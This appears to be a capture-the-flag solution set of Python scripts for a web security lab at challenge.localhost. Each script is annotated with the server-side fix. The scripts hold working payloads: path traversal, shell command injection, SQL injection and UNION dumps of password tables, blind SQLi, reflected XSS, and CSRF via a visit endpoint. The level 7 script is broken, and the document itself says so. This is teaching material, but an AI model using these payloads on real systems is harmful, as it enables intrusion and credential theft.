Web Security

level 1

import requests

# The `path` query parameter carries an absolute filesystem path (/flag).
# NOTE(review): presumably the handler opens whatever path it is handed. The
# server-side fix is to resolve the requested path and refuse anything that
# falls outside the directory the endpoint is meant to serve.
FILE_READ_URL = "http://challenge.localhost?path=/flag"
print(requests.get(FILE_READ_URL).text)

level 2

import requests

# The `timezone` value is two space-separated words ("MST date"), not a plain
# timezone name.
# NOTE(review): if the server splices this value into a command line, any
# whitespace or shell metacharacter in it changes what gets executed. The fix
# is to validate against a fixed list of timezone names and to pass the value
# as a single argv element (or an environment variable) with no shell involved.
TIMEZONE_URL = "http://challenge.localhost/?timezone=MST date"
reply = requests.get(TIMEZONE_URL)
print(reply.text)

level 3

import requests

# The request names the account it wants (`user=1`) in the query string and
# sends no cookie, token or credential alongside it.
# NOTE(review): looks like the server trusts a client-supplied identifier to
# decide whose data to return (broken access control) -- confirm. Identity
# should come from an authenticated session, never from a request parameter.
USER_URL = "http://challenge.localhost/?user=1"
page = requests.get(USER_URL)
print(page.text)

level 4

import requests

# Login form whose username ends with `" --`: the double quote closes a
# double-quoted SQL string literal and `--` starts an SQL line comment.
# NOTE(review): presumably the password comparison sits in the part of the
# statement that gets commented out. Bound parameters (placeholders) instead
# of string concatenation make the quote an ordinary character of the value.
login_form = {"username": 'flag" --', "password": 'flag'}

reply = requests.post("http://challenge.localhost/", data=login_form)
print(reply.text)

level 5

import requests

# `query` closes the string literal with `"` and appends a second SELECT via
# UNION, so rows of users.password come back in the same result set that the
# page renders. Note the request is a POST whose value travels in the URL
# query string (`params=`), not in the body.
# NOTE(review): the defence is a parameterized query; a database account
# without read access to unrelated tables and hashed (not plaintext)
# credentials limit what a single injectable statement can expose.
union_query = {"query": '" UNION SELECT password FROM users --'}

reply = requests.post("http://challenge.localhost/", params=union_query)
print(reply.text)

level 6

import requests

# Step 1 of 2: the UNION branch reads tbl_name from sqlite_master, SQLite's
# built-in schema catalogue, so the response lists the database's table names.
# NOTE(review): the catalogue is readable by any statement running on the
# connection, so hiding a table behind an unpredictable name does not help
# once the query itself is injectable.
schema_query = {"query": '" UNION SELECT tbl_name FROM sqlite_master --'}

listing = requests.post("http://challenge.localhost/", params=schema_query)
print(listing.text)
import requests

# Step 2 of 2: same UNION shape, now selecting `password` from the randomly
# named table (the name is specific to this challenge instance and is assumed
# to come from the schema listing -- it will differ on another run).
# NOTE(review): parameterizing the original query is the fix; the random table
# name is obscurity, not access control.
table_query = {
    "query": '" UNION SELECT password FROM table9110909979364706165 --'
}

dump = requests.post("http://challenge.localhost/", params=table_query)
print(dump.text)

level 7

import string
import requests

# Blind, character-by-character recovery attempt: the login response is used
# as a yes/no signal. `searchspace` is the candidate alphabet and `solution`
# accumulates the characters accepted so far.
searchspace = string.ascii_letters + string.digits + '{}._-'
solution = ''

# NOTE(review): there is no exit path here -- the `break` below only leaves
# the inner `for`, so the outer loop restarts the alphabet indefinitely.
while True:
	for char in searchspace:
		# NOTE(review): the f-string has no placeholders, so the exact same
		# username is sent for every candidate and every position; neither
		# `char` nor `len(solution)` influences the request. As written the
		# script cannot distinguish one candidate from another.
		data = {
			"username": f'" OR SUBSTR(username, 1, 1 --',
			"password": 'flag'
		}
		
		response = requests.post("http://challenge.localhost/", data = data)
		# A body beginning with "Hello" is treated as "condition was true".
		# Defender's view: any observable difference between the two outcomes
		# of an injectable login is an oracle. Parameterized queries remove
		# it, and a burst of near-identical login POSTs from one client is a
		# pattern worth alerting on.
		if response.text.startswith("Hello"):
			solution += char
			print(solution)
			break

level 8

import requests

# /visit is asked to load an /echo URL whose `echo` parameter holds a
# <script> element. The nested URL is written inline and is not
# percent-encoded by this script.
# NOTE(review): presumably /echo reflects the parameter into its HTML
# unescaped and /visit renders it in a browser -- confirm. The fix is on
# /echo: HTML-encode the reflected value for its output context, and add a
# Content-Security-Policy that disallows inline script as a second layer.
VISIT_URL = "http://challenge.localhost/visit?url=http://challenge.localhost/echo?echo=<script>alert(1)</script>"
print(requests.get(VISIT_URL).text)

level 9

import requests

# Same /visit -> /echo flow, but the reflected value first closes a
# <textarea>, then supplies the <script>, then reopens a <textarea>.
# NOTE(review): this suggests /echo places the value inside a textarea
# element, where markup is inert only until the closing tag appears.
# Encoding `<` and `&` in the reflected value keeps it inside the element;
# wrapping user input in a "text-only" tag is not an escaping strategy.
VISIT_URL = "http://challenge.localhost/visit?url=http://challenge.localhost/echo?echo=</textarea><script>alert(1)</script><textarea>"
reply = requests.get(VISIT_URL)
print(reply.text)

level 10

import requests

# Step 1 of 2: /visit is handed the site's own /leak URL as its `url`
# parameter (requests percent-encodes the value because it goes via `params=`).
# NOTE(review): presumably /visit loads the URL with a privileged session, so
# a plain GET to /leak changes state on that user's behalf (CSRF-style) --
# confirm. State changes belong behind POST plus an anti-CSRF token, and
# /visit should not carry credentials to caller-chosen URLs.
visit_args = {"url": "http://challenge.localhost/leak"}

visit_reply = requests.get("http://challenge.localhost/visit", params=visit_args)
print(visit_reply.text)
import requests

# Step 2 of 2: read /info for user id 1 without sending any credential.
# NOTE(review): the record is presumably readable only because of the
# preceding /visit call; /info should also check who is asking, not just
# whether the record has been flagged as public.
info_args = {"user": 1}

info_reply = requests.get("http://challenge.localhost/info", params=info_args)
print(info_reply.text)

level 11

import requests

# Identical request to the level 10 first step: /visit is asked to load the
# same-origin /leak URL.
# NOTE(review): whatever differs server-side in this level is not visible from
# the client script. The same reasoning applies: a GET that mutates state can
# be triggered by anything that makes a logged-in browser fetch a URL.
leak_target = "http://challenge.localhost/leak"

outcome = requests.get("http://challenge.localhost/visit", params={"url": leak_target})
print(outcome.text)
import requests

# Follow-up read of /info for user id 1, again with no session attached.
# NOTE(review): pair the state-change fix with an authorization check on this
# endpoint so disclosure does not hinge on a single flag another request can
# flip.
INFO_ENDPOINT = "http://challenge.localhost/info"

outcome = requests.get(INFO_ENDPOINT, params={"user": 1})
print(outcome.text)
